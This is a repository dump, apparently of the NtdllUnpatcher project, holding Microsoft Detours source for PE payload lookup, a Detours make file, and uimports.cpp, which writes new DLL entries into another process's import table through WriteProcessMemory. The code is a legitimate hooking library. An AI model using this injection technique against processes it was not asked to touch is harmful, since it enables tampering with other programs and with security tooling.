    _DETOUR_ENUMERATE_IMPORTS_THUNK_CONTEXT const * const
        pContext = (_DETOUR_ENUMERATE_IMPORTS_THUNK_CONTEXT*)VoidContext;
    return pContext->pfImportFunc(pContext->pContext, nOrdinal, pszFunc, ppvFunc ?
                                  *ppvFunc : NULL);
}

BOOL WINAPI DetourEnumerateImports(_In_opt_ HMODULE hModule,
                                   _In_opt_ PVOID pContext,
                                   _In_opt_ PF_DETOUR_IMPORT_FILE_CALLBACK pfImportFile,
                                   _In_opt_ PF_DETOUR_IMPORT_FUNC_CALLBACK pfImportFunc)
{
    _DETOUR_ENUMERATE_IMPORTS_THUNK_CONTEXT const context = { pContext, pfImportFunc };

    return DetourEnumerateImportsEx(hModule,
                                    (PVOID)&context,
                                    pfImportFile,
                                    &DetourEnumerateImportsThunk);
}

static PDETOUR_LOADED_BINARY WINAPI GetPayloadSectionFromModule(HMODULE hModule)
{
    PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule;
    if (hModule == NULL) {
        pDosHeader = (PIMAGE_DOS_HEADER)GetModuleHandleW(NULL);
    }

    __try {
#pragma warning(suppress:6011) // GetModuleHandleW(NULL) never returns NULL.
        if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
            SetLastError(ERROR_BAD_EXE_FORMAT);
            return NULL;
        }

        PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader +
                                                          pDosHeader->e_lfanew);
        if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) {
            SetLastError(ERROR_INVALID_EXE_SIGNATURE);
            return NULL;
        }
        if (pNtHeader->FileHeader.SizeOfOptionalHeader == 0) {
            SetLastError(ERROR_EXE_MARKED_INVALID);
            return NULL;
        }

        PIMAGE_SECTION_HEADER pSectionHeaders
            = (PIMAGE_SECTION_HEADER)((PBYTE)pNtHeader
                                      + sizeof(pNtHeader->Signature)
                                      + sizeof(pNtHeader->FileHeader)
                                      + pNtHeader->FileHeader.SizeOfOptionalHeader);

        for (DWORD n = 0; n < pNtHeader->FileHeader.NumberOfSections; n++) {
            if (strcmp((PCHAR)pSectionHeaders[n].Name, ".detour") == 0) {
                if (pSectionHeaders[n].VirtualAddress == 0 ||
                    pSectionHeaders[n].SizeOfRawData == 0) {

                    break;
                }

                PBYTE pbData = (PBYTE)pDosHeader + pSectionHeaders[n].VirtualAddress;
                DETOUR_SECTION_HEADER *pHeader =
                    (DETOUR_SECTION_HEADER *)pbData;
                if (pHeader->cbHeaderSize < sizeof(DETOUR_SECTION_HEADER) ||
                    pHeader->nSignature != DETOUR_SECTION_HEADER_SIGNATURE) {

                    break;
                }

                if (pHeader->nDataOffset == 0) {
                    pHeader->nDataOffset = pHeader->cbHeaderSize;
                }
                SetLastError(NO_ERROR);
                return (PBYTE)pHeader;
            }
        }
        SetLastError(ERROR_EXE_MARKED_INVALID);
        return NULL;
    }
    __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ?
             EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) {
        SetLastError(ERROR_EXE_MARKED_INVALID);
        return NULL;
    }
}

DWORD WINAPI DetourGetSizeOfPayloads(_In_opt_ HMODULE hModule)
{
    PDETOUR_LOADED_BINARY pBinary = GetPayloadSectionFromModule(hModule);
    if (pBinary == NULL) {
        // Error set by GetPayloadSectionFromModule.
        return 0;
    }

    __try {
        DETOUR_SECTION_HEADER *pHeader = (DETOUR_SECTION_HEADER *)pBinary;
        if (pHeader->cbHeaderSize < sizeof(DETOUR_SECTION_HEADER) ||
            pHeader->nSignature != DETOUR_SECTION_HEADER_SIGNATURE) {

            SetLastError(ERROR_INVALID_HANDLE);
            return 0;
        }
        SetLastError(NO_ERROR);
        return pHeader->cbDataSize;
    }
    __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ?
             EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) {
        SetLastError(ERROR_INVALID_HANDLE);
        return 0;
    }
}

_Writable_bytes_(*pcbData)
_Readable_bytes_(*pcbData)
_Success_(return != NULL)
PVOID WINAPI DetourFindPayload(_In_opt_ HMODULE hModule,
                               _In_ REFGUID rguid,
                               _Out_ DWORD *pcbData)
{
    PBYTE pbData = NULL;
    if (pcbData) {
        *pcbData = 0;
    }

    PDETOUR_LOADED_BINARY pBinary = GetPayloadSectionFromModule(hModule);
    if (pBinary == NULL) {
        // Error set by GetPayloadSectionFromModule.
        return NULL;
    }

    __try {
        DETOUR_SECTION_HEADER *pHeader = (DETOUR_SECTION_HEADER *)pBinary;
        if (pHeader->cbHeaderSize < sizeof(DETOUR_SECTION_HEADER) ||
            pHeader->nSignature != DETOUR_SECTION_HEADER_SIGNATURE) {

            SetLastError(ERROR_INVALID_EXE_SIGNATURE);
            return NULL;
        }

        PBYTE pbBeg = ((PBYTE)pHeader) + pHeader->nDataOffset;
        PBYTE pbEnd = ((PBYTE)pHeader) + pHeader->cbDataSize;

        for (pbData = pbBeg; pbData < pbEnd;) {
            DETOUR_SECTION_RECORD *pSection = (DETOUR_SECTION_RECORD *)pbData;

            if (pSection->guid.Data1 == rguid.Data1 &&
                pSection->guid.Data2 == rguid.Data2 &&
                pSection->guid.Data3 == rguid.Data3 &&
                pSection->guid.Data4[0] == rguid.Data4[0] &&
                pSection->guid.Data4[1] == rguid.Data4[1] &&
                pSection->guid.Data4[2] == rguid.Data4[2] &&
                pSection->guid.Data4[3] == rguid.Data4[3] &&
                pSection->guid.Data4[4] == rguid.Data4[4] &&
                pSection->guid.Data4[5] == rguid.Data4[5] &&
                pSection->guid.Data4[6] == rguid.Data4[6] &&
                pSection->guid.Data4[7] == rguid.Data4[7]) {

                if (pcbData) {
                    *pcbData = pSection->cbBytes - sizeof(*pSection);
                    SetLastError(NO_ERROR);
                    return (PBYTE)(pSection + 1);
                }
            }

            pbData = (PBYTE)pSection + pSection->cbBytes;
        }
        SetLastError(ERROR_INVALID_HANDLE);
        return NULL;
    }
    __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ?
             EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) {
        SetLastError(ERROR_INVALID_HANDLE);
        return NULL;
    }
}

_Writable_bytes_(*pcbData)
_Readable_bytes_(*pcbData)
_Success_(return != NULL)
PVOID WINAPI DetourFindPayloadEx(_In_ REFGUID rguid,
                                 _Out_ DWORD * pcbData)
{
    for (HMODULE hMod = NULL; (hMod = DetourEnumerateModules(hMod)) != NULL;) {
        PVOID pvData;

        pvData = DetourFindPayload(hMod, rguid, pcbData);
        if (pvData != NULL) {
            return pvData;
        }
    }
    SetLastError(ERROR_MOD_NOT_FOUND);
    return NULL;
}

BOOL WINAPI DetourRestoreAfterWithEx(_In_reads_bytes_(cbData) PVOID pvData,
                                     _In_ DWORD cbData)
{
    PDETOUR_EXE_RESTORE pder = (PDETOUR_EXE_RESTORE)pvData;

    if (pder->cb != sizeof(*pder) || pder->cb > cbData) {
        SetLastError(ERROR_BAD_EXE_FORMAT);
        return FALSE;
    }

    DWORD dwPermIdh = ~0u;
    DWORD dwPermInh = ~0u;
    DWORD dwPermClr = ~0u;
    DWORD dwIgnore;
    BOOL fSucceeded = FALSE;
    BOOL fUpdated32To64 = FALSE;

    if (pder->pclr != NULL && pder->clr.Flags != ((PDETOUR_CLR_HEADER)pder->pclr)->Flags) {
        // If we had to promote the 32/64-bit agnostic IL to 64-bit, we can't restore
        // that.
        fUpdated32To64 = TRUE;
    }

    if (DetourVirtualProtectSameExecute(pder->pidh, pder->cbidh,
                                        PAGE_EXECUTE_READWRITE, &dwPermIdh)) {
        if (DetourVirtualProtectSameExecute(pder->pinh, pder->cbinh,
                                            PAGE_EXECUTE_READWRITE, &dwPermInh)) {

            CopyMemory(pder->pidh, &pder->idh, pder->cbidh);
            CopyMemory(pder->pinh, &pder->inh, pder->cbinh);

            if (pder->pclr != NULL && !fUpdated32To64) {
                if (DetourVirtualProtectSameExecute(pder->pclr, pder->cbclr,
                                                    PAGE_EXECUTE_READWRITE, &dwPermClr)) {
                    CopyMemory(pder->pclr, &pder->clr, pder->cbclr);
                    VirtualProtect(pder->pclr, pder->cbclr, dwPermClr, &dwIgnore);
                    fSucceeded = TRUE;
                }
            }
            else {
                fSucceeded = TRUE;
            }
            VirtualProtect(pder->pinh, pder->cbinh, dwPermInh, &dwIgnore);
        }
        VirtualProtect(pder->pidh, pder->cbidh, dwPermIdh, &dwIgnore);
    }
    return fSucceeded;
}

BOOL WINAPI DetourRestoreAfterWith()
{
    PVOID pvData;
    DWORD cbData;

    pvData = DetourFindPayloadEx(DETOUR_EXE_RESTORE_GUID, &cbData);

    if (pvData != NULL && cbData != 0) {
        return DetourRestoreAfterWithEx(pvData, cbData);
    }
    SetLastError(ERROR_MOD_NOT_FOUND);
    return FALSE;
}

// End of File

--------------------------------------------------------------------------------
/Detours-master/src/obj.X64/creatwth.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/creatwth.obj
--------------------------------------------------------------------------------
/Detours-master/src/obj.X64/detours.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/detours.obj
--------------------------------------------------------------------------------
/Detours-master/src/obj.X64/disasm.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/disasm.obj
--------------------------------------------------------------------------------
/Detours-master/src/obj.X64/disolarm.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/disolarm.obj
--------------------------------------------------------------------------------
/Detours-master/src/obj.X64/disolarm64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/disolarm64.obj
--------------------------------------------------------------------------------
/Detours-master/src/obj.X64/disolia64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/disolia64.obj
--------------------------------------------------------------------------------
/Detours-master/src/obj.X64/disolx64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/disolx64.obj
--------------------------------------------------------------------------------
/Detours-master/src/obj.X64/disolx86.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/disolx86.obj
--------------------------------------------------------------------------------
/Detours-master/src/obj.X64/image.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/image.obj
--------------------------------------------------------------------------------
/Detours-master/src/obj.X64/modules.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/modules.obj
--------------------------------------------------------------------------------
/Detours-master/src/uimports.cpp:
--------------------------------------------------------------------------------
//////////////////////////////////////////////////////////////////////////////
//
//  Add DLLs to a module import table (uimports.cpp of detours.lib)
//
//  Microsoft Research Detours Package, Version 4.0.1
//
//  Copyright (c) Microsoft Corporation.  All rights reserved.
//
//  Note that this file is included into creatwth.cpp one or more times
//  (once for each supported module format).
//

#if DETOURS_VERSION != 0x4c0c1   // 0xMAJORcMINORcPATCH
#error detours.h version mismatch
#endif

// UpdateImports32 aka UpdateImports64
static BOOL UPDATE_IMPORTS_XX(HANDLE hProcess,
                              HMODULE hModule,
                              __in_ecount(nDlls) LPCSTR *plpDlls,
                              DWORD nDlls)
{
    BOOL fSucceeded = FALSE;
    DWORD cbNew = 0;

    BYTE * pbNew = NULL;
    DWORD i;
    SIZE_T cbRead;
    DWORD n;

    PBYTE pbModule = (PBYTE)hModule;

    IMAGE_DOS_HEADER idh;
    ZeroMemory(&idh, sizeof(idh));
    if (!ReadProcessMemory(hProcess, pbModule, &idh, sizeof(idh), &cbRead)
        || cbRead < sizeof(idh)) {

        DETOUR_TRACE(("ReadProcessMemory(idh@%p..%p) failed: %d\n",
                      pbModule, pbModule + sizeof(idh), GetLastError()));

      finish:
        if (pbNew != NULL) {
            delete[] pbNew;
            pbNew = NULL;
        }
        return fSucceeded;
    }

    IMAGE_NT_HEADERS_XX inh;
    ZeroMemory(&inh, sizeof(inh));

    if (!ReadProcessMemory(hProcess, pbModule + idh.e_lfanew, &inh, sizeof(inh), &cbRead)
        || cbRead < sizeof(inh)) {
        DETOUR_TRACE(("ReadProcessMemory(inh@%p..%p) failed: %d\n",
                      pbModule + idh.e_lfanew,
                      pbModule + idh.e_lfanew + sizeof(inh),
                      GetLastError()));
        goto finish;
    }

    if (inh.OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR_MAGIC_XX) {
        DETOUR_TRACE(("Wrong size image (%04x != %04x).\n",
                      inh.OptionalHeader.Magic, IMAGE_NT_OPTIONAL_HDR_MAGIC_XX));
        SetLastError(ERROR_INVALID_BLOCK);
        goto finish;
    }

    // Zero out the bound table so loader doesn't use it instead of our new table.
    inh.BOUND_DIRECTORY.VirtualAddress = 0;
    inh.BOUND_DIRECTORY.Size = 0;

    // Find the size of the mapped file.
73 | DWORD dwSec = idh.e_lfanew + 74 | FIELD_OFFSET(IMAGE_NT_HEADERS_XX, OptionalHeader) + 75 | inh.FileHeader.SizeOfOptionalHeader; 76 | 77 | for (i = 0; i < inh.FileHeader.NumberOfSections; i++) { 78 | IMAGE_SECTION_HEADER ish; 79 | ZeroMemory(&ish, sizeof(ish)); 80 | 81 | if (!ReadProcessMemory(hProcess, pbModule + dwSec + sizeof(ish) * i, &ish, 82 | sizeof(ish), &cbRead) 83 | || cbRead < sizeof(ish)) { 84 | 85 | DETOUR_TRACE(("ReadProcessMemory(ish@%p..%p) failed: %d\n", 86 | pbModule + dwSec + sizeof(ish) * i, 87 | pbModule + dwSec + sizeof(ish) * (i + 1), 88 | GetLastError())); 89 | goto finish; 90 | } 91 | 92 | DETOUR_TRACE(("ish[%d] : va=%08x sr=%d\n", i, ish.VirtualAddress, ish.SizeOfRawData)); 93 | 94 | // If the file didn't have an IAT_DIRECTORY, we assign it... 95 | if (inh.IAT_DIRECTORY.VirtualAddress == 0 && 96 | inh.IMPORT_DIRECTORY.VirtualAddress >= ish.VirtualAddress && 97 | inh.IMPORT_DIRECTORY.VirtualAddress < ish.VirtualAddress + ish.SizeOfRawData) { 98 | 99 | inh.IAT_DIRECTORY.VirtualAddress = ish.VirtualAddress; 100 | inh.IAT_DIRECTORY.Size = ish.SizeOfRawData; 101 | } 102 | } 103 | 104 | DETOUR_TRACE((" Imports: %p..%p\n", 105 | (DWORD_PTR)pbModule + inh.IMPORT_DIRECTORY.VirtualAddress, 106 | (DWORD_PTR)pbModule + inh.IMPORT_DIRECTORY.VirtualAddress + 107 | inh.IMPORT_DIRECTORY.Size)); 108 | 109 | DWORD nOldDlls = inh.IMPORT_DIRECTORY.Size / sizeof(IMAGE_IMPORT_DESCRIPTOR); 110 | DWORD obRem = sizeof(IMAGE_IMPORT_DESCRIPTOR) * nDlls; 111 | DWORD obOld = obRem + sizeof(IMAGE_IMPORT_DESCRIPTOR) * nOldDlls; 112 | DWORD obTab = PadToDwordPtr(obOld); 113 | DWORD obDll = obTab + sizeof(DWORD_XX) * 4 * nDlls; 114 | DWORD obStr = obDll; 115 | cbNew = obStr; 116 | for (n = 0; n < nDlls; n++) { 117 | cbNew += PadToDword((DWORD)strlen(plpDlls[n]) + 1); 118 | } 119 | 120 | _Analysis_assume_(cbNew > 121 | sizeof(IMAGE_IMPORT_DESCRIPTOR) * (nDlls + nOldDlls) 122 | + sizeof(DWORD_XX) * 4 * nDlls); 123 | pbNew = new BYTE [cbNew]; 124 | if (pbNew == NULL) { 
125 | DETOUR_TRACE(("new BYTE [cbNew] failed.\n")); 126 | goto finish; 127 | } 128 | ZeroMemory(pbNew, cbNew); 129 | 130 | PBYTE pbBase = pbModule; 131 | PBYTE pbNext = pbBase 132 | + inh.OptionalHeader.BaseOfCode 133 | + inh.OptionalHeader.SizeOfCode 134 | + inh.OptionalHeader.SizeOfInitializedData 135 | + inh.OptionalHeader.SizeOfUninitializedData; 136 | if (pbBase < pbNext) { 137 | pbBase = pbNext; 138 | } 139 | DETOUR_TRACE(("pbBase = %p\n", pbBase)); 140 | 141 | PBYTE pbNewIid = FindAndAllocateNearBase(hProcess, pbModule, pbBase, cbNew); 142 | if (pbNewIid == NULL) { 143 | DETOUR_TRACE(("FindAndAllocateNearBase failed.\n")); 144 | goto finish; 145 | } 146 | 147 | PIMAGE_IMPORT_DESCRIPTOR piid = (PIMAGE_IMPORT_DESCRIPTOR)pbNew; 148 | DWORD_XX *pt; 149 | 150 | DWORD obBase = (DWORD)(pbNewIid - pbModule); 151 | DWORD dwProtect = 0; 152 | 153 | if (inh.IMPORT_DIRECTORY.VirtualAddress != 0) { 154 | // Read the old import directory if it exists. 155 | DETOUR_TRACE(("IMPORT_DIRECTORY perms=%x\n", dwProtect)); 156 | 157 | if (!ReadProcessMemory(hProcess, 158 | pbModule + inh.IMPORT_DIRECTORY.VirtualAddress, 159 | &piid[nDlls], 160 | nOldDlls * sizeof(IMAGE_IMPORT_DESCRIPTOR), &cbRead) 161 | || cbRead < nOldDlls * sizeof(IMAGE_IMPORT_DESCRIPTOR)) { 162 | 163 | DETOUR_TRACE(("ReadProcessMemory(imports) failed: %d\n", GetLastError())); 164 | goto finish; 165 | } 166 | } 167 | 168 | for (n = 0; n < nDlls; n++) { 169 | HRESULT hrRet = StringCchCopyA((char*)pbNew + obStr, cbNew - obStr, plpDlls[n]); 170 | if (FAILED(hrRet)) { 171 | DETOUR_TRACE(("StringCchCopyA failed: %d\n", GetLastError())); 172 | goto finish; 173 | } 174 | 175 | // After copying the string, we patch up the size "??" bits if any. 
176 | hrRet = ReplaceOptionalSizeA((char*)pbNew + obStr, 177 | cbNew - obStr, 178 | DETOURS_STRINGIFY(DETOURS_BITS_XX)); 179 | if (FAILED(hrRet)) { 180 | DETOUR_TRACE(("ReplaceOptionalSizeA failed: %d\n", GetLastError())); 181 | goto finish; 182 | } 183 | 184 | DWORD nOffset = obTab + (sizeof(DWORD_XX) * (4 * n)); 185 | piid[n].OriginalFirstThunk = obBase + nOffset; 186 | pt = ((DWORD_XX*)(pbNew + nOffset)); 187 | pt[0] = IMAGE_ORDINAL_FLAG_XX + 1; 188 | pt[1] = 0; 189 | 190 | nOffset = obTab + (sizeof(DWORD_XX) * ((4 * n) + 2)); 191 | piid[n].FirstThunk = obBase + nOffset; 192 | pt = ((DWORD_XX*)(pbNew + nOffset)); 193 | pt[0] = IMAGE_ORDINAL_FLAG_XX + 1; 194 | pt[1] = 0; 195 | piid[n].TimeDateStamp = 0; 196 | piid[n].ForwarderChain = 0; 197 | piid[n].Name = obBase + obStr; 198 | 199 | obStr += PadToDword((DWORD)strlen(plpDlls[n]) + 1); 200 | } 201 | _Analysis_assume_(obStr <= cbNew); 202 | 203 | #if 0 204 | for (i = 0; i < nDlls + nOldDlls; i++) { 205 | DETOUR_TRACE(("%8d. Look=%08x Time=%08x Fore=%08x Name=%08x Addr=%08x\n", 206 | i, 207 | piid[i].OriginalFirstThunk, 208 | piid[i].TimeDateStamp, 209 | piid[i].ForwarderChain, 210 | piid[i].Name, 211 | piid[i].FirstThunk)); 212 | if (piid[i].OriginalFirstThunk == 0 && piid[i].FirstThunk == 0) { 213 | break; 214 | } 215 | } 216 | #endif 217 | 218 | if (!WriteProcessMemory(hProcess, pbNewIid, pbNew, obStr, NULL)) { 219 | DETOUR_TRACE(("WriteProcessMemory(iid) failed: %d\n", GetLastError())); 220 | goto finish; 221 | } 222 | 223 | DETOUR_TRACE(("obBaseBef = %08x..%08x\n", 224 | inh.IMPORT_DIRECTORY.VirtualAddress, 225 | inh.IMPORT_DIRECTORY.VirtualAddress + inh.IMPORT_DIRECTORY.Size)); 226 | DETOUR_TRACE(("obBaseAft = %08x..%08x\n", obBase, obBase + obStr)); 227 | 228 | // If the file doesn't have an IAT_DIRECTORY, we create it... 
229 | if (inh.IAT_DIRECTORY.VirtualAddress == 0) { 230 | inh.IAT_DIRECTORY.VirtualAddress = obBase; 231 | inh.IAT_DIRECTORY.Size = cbNew; 232 | } 233 | 234 | inh.IMPORT_DIRECTORY.VirtualAddress = obBase; 235 | inh.IMPORT_DIRECTORY.Size = cbNew; 236 | 237 | /////////////////////// Update the NT header for the new import directory. 238 | // 239 | if (!DetourVirtualProtectSameExecuteEx(hProcess, pbModule, inh.OptionalHeader.SizeOfHeaders, 240 | PAGE_EXECUTE_READWRITE, &dwProtect)) { 241 | DETOUR_TRACE(("VirtualProtectEx(inh) write failed: %d\n", GetLastError())); 242 | goto finish; 243 | } 244 | 245 | inh.OptionalHeader.CheckSum = 0; 246 | 247 | if (!WriteProcessMemory(hProcess, pbModule, &idh, sizeof(idh), NULL)) { 248 | DETOUR_TRACE(("WriteProcessMemory(idh) failed: %d\n", GetLastError())); 249 | goto finish; 250 | } 251 | DETOUR_TRACE(("WriteProcessMemory(idh:%p..%p)\n", pbModule, pbModule + sizeof(idh))); 252 | 253 | if (!WriteProcessMemory(hProcess, pbModule + idh.e_lfanew, &inh, sizeof(inh), NULL)) { 254 | DETOUR_TRACE(("WriteProcessMemory(inh) failed: %d\n", GetLastError())); 255 | goto finish; 256 | } 257 | DETOUR_TRACE(("WriteProcessMemory(inh:%p..%p)\n", 258 | pbModule + idh.e_lfanew, 259 | pbModule + idh.e_lfanew + sizeof(inh))); 260 | 261 | if (!VirtualProtectEx(hProcess, pbModule, inh.OptionalHeader.SizeOfHeaders, 262 | dwProtect, &dwProtect)) { 263 | DETOUR_TRACE(("VirtualProtectEx(idh) restore failed: %d\n", GetLastError())); 264 | goto finish; 265 | } 266 | 267 | fSucceeded = TRUE; 268 | goto finish; 269 | } 270 | -------------------------------------------------------------------------------- /Detours-master/system.mak: -------------------------------------------------------------------------------- 1 | ############################################################################## 2 | ## 3 | ## Establish build target type for Detours. 4 | ## 5 | ## Microsoft Research Detours Package 6 | ## 7 | ## Copyright (c) Microsoft Corporation. 
All rights reserved. 8 | ## 9 | 10 | ############################################## Determine Processor Build Type. 11 | ## 12 | !IF "$(DETOURS_TARGET_PROCESSOR)" == "" && "$(PROCESSOR_ARCHITEW6432)" != "" 13 | DETOURS_TARGET_PROCESSOR = X86 14 | !ENDIF 15 | 16 | !IF "$(DETOURS_TARGET_PROCESSOR)" == "" 17 | DETOURS_TARGET_PROCESSOR = $(PROCESSOR_ARCHITECTURE) 18 | !ENDIF 19 | 20 | # uppercase DETOURS_TARGET_PROCESSOR 21 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:a=A) 22 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:b=B) 23 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:c=C) 24 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:d=D) 25 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:e=E) 26 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:f=F) 27 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:g=G) 28 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:h=H) 29 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:i=I) 30 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:j=J) 31 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:k=K) 32 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:l=L) 33 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:m=M) 34 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:n=N) 35 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:o=O) 36 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:p=P) 37 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:q=Q) 38 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:r=R) 39 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:s=S) 40 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:t=T) 41 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:u=U) 42 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:v=V) 43 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:w=W) 44 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:x=X) 45 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:y=Y) 46 | 
DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:z=Z) 47 | 48 | !IF "$(DETOURS_TARGET_PROCESSOR)" == "AMD64" 49 | DETOURS_TARGET_PROCESSOR = X64 50 | !ENDIF 51 | 52 | 53 | !if "$(DETOURS_TARGET_PROCESSOR:64=)" == "$(DETOURS_TARGET_PROCESSOR)" 54 | DETOURS_32BIT=1 55 | DETOURS_BITS=32 56 | !else 57 | DETOURS_64BIT=1 58 | DETOURS_BITS=64 59 | !endif 60 | 61 | ########################################## Configure build based on Processor. 62 | ## 63 | ## DETOURS_OPTION_PROCESSOR: Set this macro if the processor *will* run code 64 | ## from another ISA (i.e. x86 on x64). 65 | ## 66 | ## DETOURS_OPTION_BITS: Set this macro if the processor *may* have an 67 | ## an alternative word size. 68 | ## 69 | !IF "$(DETOURS_TARGET_PROCESSOR)" == "X64" 70 | #!MESSAGE Building for 64-bit X64. 71 | DETOURS_SOURCE_BROWSING = 0 72 | DETOURS_OPTION_PROCESSOR=X86 73 | DETOURS_OPTION_BITS=32 74 | !ELSEIF "$(DETOURS_TARGET_PROCESSOR)" == "IA64" 75 | #!MESSAGE Building for 64-bit IA64. 76 | DETOURS_OPTION_PROCESSOR=X86 77 | DETOURS_OPTION_BITS=32 78 | !ELSEIF "$(DETOURS_TARGET_PROCESSOR)" == "X86" 79 | #!MESSAGE Building for 32-bit X86. 80 | DETOURS_OPTION_BITS=64 81 | # Don't set DETOURS_OPTION_PROCESSOR for x64 because we don't *know* that 82 | # we'll run on a 64-bit machine. 83 | !ELSEIF "$(DETOURS_TARGET_PROCESSOR)" == "ARM" 84 | #!MESSAGE Building for 32-bit ARM. 85 | !ELSEIF "$(DETOURS_TARGET_PROCESSOR)" == "ARM64" 86 | #!MESSAGE Building for 64-bit ARM. 87 | !ELSE 88 | !MESSAGE Note: To select the target processor architecture set either 89 | !MESSAGE PROCESSOR_ARCHITECTURE or DETOURS_TARGET_PROCESSOR. 
90 | !MESSAGE 91 | !ERROR Unknown target processor: $(DETOURS_TARGET_ARCHITECTURE) 92 | !ENDIF 93 | 94 | ############################################################################## 95 | ## 96 | INCD = $(ROOT)\include 97 | LIBD = $(ROOT)\lib.$(DETOURS_TARGET_PROCESSOR)$(DETOURS_CONFIG) 98 | BIND = $(ROOT)\bin.$(DETOURS_TARGET_PROCESSOR)$(DETOURS_CONFIG) 99 | OBJD = obj.$(DETOURS_TARGET_PROCESSOR)$(DETOURS_CONFIG) 100 | !IF "$(DETOURS_OPTION_PROCESSOR)" != "" 101 | OPTD = $(ROOT)\bin.$(DETOURS_OPTION_PROCESSOR)$(DETOURS_CONFIG) 102 | !ENDIF 103 | 104 | INCDS = $(ROOT)\include 105 | 106 | LIBDS = \ 107 | $(ROOT)\lib.x86$(DETOURS_CONFIG) \ 108 | $(ROOT)\lib.x64$(DETOURS_CONFIG) \ 109 | $(ROOT)\lib.ia64$(DETOURS_CONFIG) \ 110 | $(ROOT)\lib.arm$(DETOURS_CONFIG) \ 111 | $(ROOT)\lib.arm64$(DETOURS_CONFIG) \ 112 | 113 | BINDS = \ 114 | $(ROOT)\bin.x86$(DETOURS_CONFIG) \ 115 | $(ROOT)\bin.x64$(DETOURS_CONFIG) \ 116 | $(ROOT)\bin.ia64$(DETOURS_CONFIG) \ 117 | $(ROOT)\bin.arm$(DETOURS_CONFIG) \ 118 | $(ROOT)\bin.arm64$(DETOURS_CONFIG) \ 119 | 120 | OBJDS = \ 121 | obj.x86$(DETOURS_CONFIG) \ 122 | obj.x64$(DETOURS_CONFIG) \ 123 | obj.ia64$(DETOURS_CONFIG) \ 124 | obj.arm$(DETOURS_CONFIG) \ 125 | obj.arm64$(DETOURS_CONFIG) \ 126 | 127 | ############################################################################## 128 | -------------------------------------------------------------------------------- /NtdllUnpatcher.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.421 5 | MinimumVisualStudioVersion = 